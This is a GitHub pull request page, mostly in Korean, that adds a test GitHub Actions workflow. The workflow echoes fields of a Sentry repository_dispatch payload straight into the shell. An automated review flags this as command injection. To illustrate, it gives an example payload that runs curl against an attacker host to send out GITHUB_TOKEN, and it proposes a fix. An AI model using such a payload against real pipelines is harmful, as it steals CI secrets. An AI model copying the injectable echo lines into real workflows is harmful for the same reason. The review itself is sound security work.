Skip to content

[공통] sentry dispatch 테스트#1274

Merged
dooohun merged 1 commit into
developfrom
chore/sentry-dispatch-test
Jun 8, 2026
Merged

[공통] sentry dispatch 테스트#1274
dooohun merged 1 commit into
developfrom
chore/sentry-dispatch-test

Conversation

@dooohun

@dooohun dooohun commented Jun 8, 2026

Copy link
Copy Markdown
Contributor

What is this PR? 🔍

  • 기능 : sentry dispatch 테스트

Changes 📝

  • Sentry Webhook Receiver의 repository_dispatch 호출 시 GitHub Actions 실행 여부 확인용 테스트 workflow 추가
  • sentry-error 타입 이벤트 수신 시 client_payload 필드 출력

ScreenShot 📷

N/A

Precaution

webhook 요청을 위한 receiver 서버 추가

✔️ Please check if the PR fulfills these requirements

  • It's submitted to the correct branch, not the develop branch unconditionally?
  • If on a hotfix branch, ensure it targets main?
  • There are no warning message when you run yarn lint

Summary by CodeRabbit

릴리스 노트

  • Chores
    • Sentry 에러 이벤트 처리를 위한 자동화 워크플로우 추가

@dooohun dooohun self-assigned this Jun 8, 2026
@dooohun dooohun added the ✅ Test Test 관련 label Jun 8, 2026
@coderabbitai

coderabbitai Bot commented Jun 8, 2026

Copy link
Copy Markdown

Review Change Stack

워크스루

repository_dispatch 이벤트의 sentry-error 타입에 대응하는 GitHub 액션 워크플로를 추가합니다. Sentry 페이로드의 주요 필드들을 표준 출력으로 검증합니다.

변경사항

Sentry 디스패치 테스트 워크플로

계층 / 파일 설명
Sentry 디스패치 테스트 워크플로
.github/workflows/sentry-dispatch-test.yml
repository_dispatch 이벤트 타입 sentry-error를 수신하여 ubuntu-latest 러너에서 실행되도록 구성하고, Sentry 페이로드의 issue_id, title, sentry_url, environment, level, project 필드를 출력합니다.

추정 코드 리뷰 난이도

🎯 1 (간단함) | ⏱️ ~5분

제안 라벨

⚙ Setting

제안 리뷰어

  • ParkSungju01
  • JeongWon-CHO
  • dh2906
🚥 Pre-merge checks | ✅ 5
✅ Passed checks (5 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title check ✅ Passed 제목이 pull request의 주요 변경 사항을 명확하게 요약하고 있으며, Sentry dispatch 테스트 워크플로 추가라는 핵심 변경사항을 정확히 반영합니다.
Docstring Coverage ✅ Passed No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
Linked Issues check ✅ Passed Check skipped because no linked issues were found for this pull request.
Out of Scope Changes check ✅ Passed Check skipped because no linked issues were found for this pull request.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

✨ Finishing Touches
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Commit unit tests in branch chore/sentry-dispatch-test

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

@github-actions github-actions Bot requested review from ParkSungju01 and ff1451 June 8, 2026 14:40

@coderabbitai coderabbitai Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In @.github/workflows/sentry-dispatch-test.yml:
- Around line 14-19: The echo lines directly expand github.event.client_payload
fields into the shell, allowing command injection; instead set those values into
GitHub Actions environment variables (e.g. write ISSUE_ID, TITLE, SENTRY_URL,
ENVIRONMENT, LEVEL, PROJECT into $GITHUB_ENV using lines like echo "ISSUE_ID=${{
github.event.client_payload.issue_id }}" >> $GITHUB_ENV) and then reference the
safe env vars in subsequent run steps (e.g. echo "Issue ID: $ISSUE_ID"),
replacing the direct uses of ${{ github.event.client_payload.title }}, ${{
github.event.client_payload.sentry_url }}, ${{
github.event.client_payload.environment }}, ${{
github.event.client_payload.level }}, and ${{
github.event.client_payload.project }}.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

Run ID: 3b32a9b1-94ea-4ed0-bb0a-914340ab2d5d

📥 Commits

Reviewing files that changed from the base of the PR and between 786fd96 and b3ea9e8.

📒 Files selected for processing (1)
  • .github/workflows/sentry-dispatch-test.yml

Comment on lines +14 to +19
echo "Issue ID: ${{ github.event.client_payload.issue_id }}"
echo "Title: ${{ github.event.client_payload.title }}"
echo "Sentry URL: ${{ github.event.client_payload.sentry_url }}"
echo "Environment: ${{ github.event.client_payload.environment }}"
echo "Level: ${{ github.event.client_payload.level }}"
echo "Project: ${{ github.event.client_payload.project }}"

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical | ⚡ Quick win

템플릿 인젝션 취약점: client_payload를 직접 셸 명령에 확장하지 마세요.

외부 웹훅 리시버에서 전송되는 client_payload 값을 셸 명령에 직접 확장(${{ }})하면 명령 인젝션 공격에 취약합니다. 악의적인 페이로드에 셸 메타문자(;, $(), `, 등)가 포함될 경우 임의 코드가 실행될 수 있습니다.

예를 들어, title 필드에 "; curl http://attacker.com?token=$GITHUB_TOKEN; echo "와 같은 값이 포함되면 민감한 정보가 유출되거나 CI 환경이 손상될 수 있습니다.

🔒 권장 수정: 환경 변수를 통한 안전한 값 전달
     steps:
       - name: Print Sentry payload
+        env:
+          ISSUE_ID: ${{ github.event.client_payload.issue_id }}
+          TITLE: ${{ github.event.client_payload.title }}
+          SENTRY_URL: ${{ github.event.client_payload.sentry_url }}
+          ENVIRONMENT: ${{ github.event.client_payload.environment }}
+          LEVEL: ${{ github.event.client_payload.level }}
+          PROJECT: ${{ github.event.client_payload.project }}
         run: |
-          echo "Issue ID: ${{ github.event.client_payload.issue_id }}"
-          echo "Title: ${{ github.event.client_payload.title }}"
-          echo "Sentry URL: ${{ github.event.client_payload.sentry_url }}"
-          echo "Environment: ${{ github.event.client_payload.environment }}"
-          echo "Level: ${{ github.event.client_payload.level }}"
-          echo "Project: ${{ github.event.client_payload.project }}"
+          echo "Issue ID: $ISSUE_ID"
+          echo "Title: $TITLE"
+          echo "Sentry URL: $SENTRY_URL"
+          echo "Environment: $ENVIRONMENT"
+          echo "Level: $LEVEL"
+          echo "Project: $PROJECT"

환경 변수로 설정할 때 GitHub Actions가 자동으로 이스케이프 처리하므로 인젝션 공격을 방지할 수 있습니다.

🧰 Tools
🪛 zizmor (1.25.2)

[error] 14-14: code injection via template expansion (template-injection): may expand into attacker-controllable code

(template-injection)


[error] 15-15: code injection via template expansion (template-injection): may expand into attacker-controllable code

(template-injection)


[error] 16-16: code injection via template expansion (template-injection): may expand into attacker-controllable code

(template-injection)


[error] 17-17: code injection via template expansion (template-injection): may expand into attacker-controllable code

(template-injection)


[error] 18-18: code injection via template expansion (template-injection): may expand into attacker-controllable code

(template-injection)


[error] 19-19: code injection via template expansion (template-injection): may expand into attacker-controllable code

(template-injection)

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In @.github/workflows/sentry-dispatch-test.yml around lines 14 - 19, The echo
lines directly expand github.event.client_payload fields into the shell,
allowing command injection; instead set those values into GitHub Actions
environment variables (e.g. write ISSUE_ID, TITLE, SENTRY_URL, ENVIRONMENT,
LEVEL, PROJECT into $GITHUB_ENV using lines like echo "ISSUE_ID=${{
github.event.client_payload.issue_id }}" >> $GITHUB_ENV) and then reference the
safe env vars in subsequent run steps (e.g. echo "Issue ID: $ISSUE_ID"),
replacing the direct uses of ${{ github.event.client_payload.title }}, ${{
github.event.client_payload.sentry_url }}, ${{
github.event.client_payload.environment }}, ${{
github.event.client_payload.level }}, and ${{
github.event.client_payload.project }}.

Source: Linters/SAST tools

@ff1451 ff1451 left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

👍

@dooohun dooohun merged commit b25328a into develop Jun 8, 2026
4 of 5 checks passed
@dooohun dooohun deleted the chore/sentry-dispatch-test branch June 8, 2026 14:47
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

✅ Test Test 관련

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants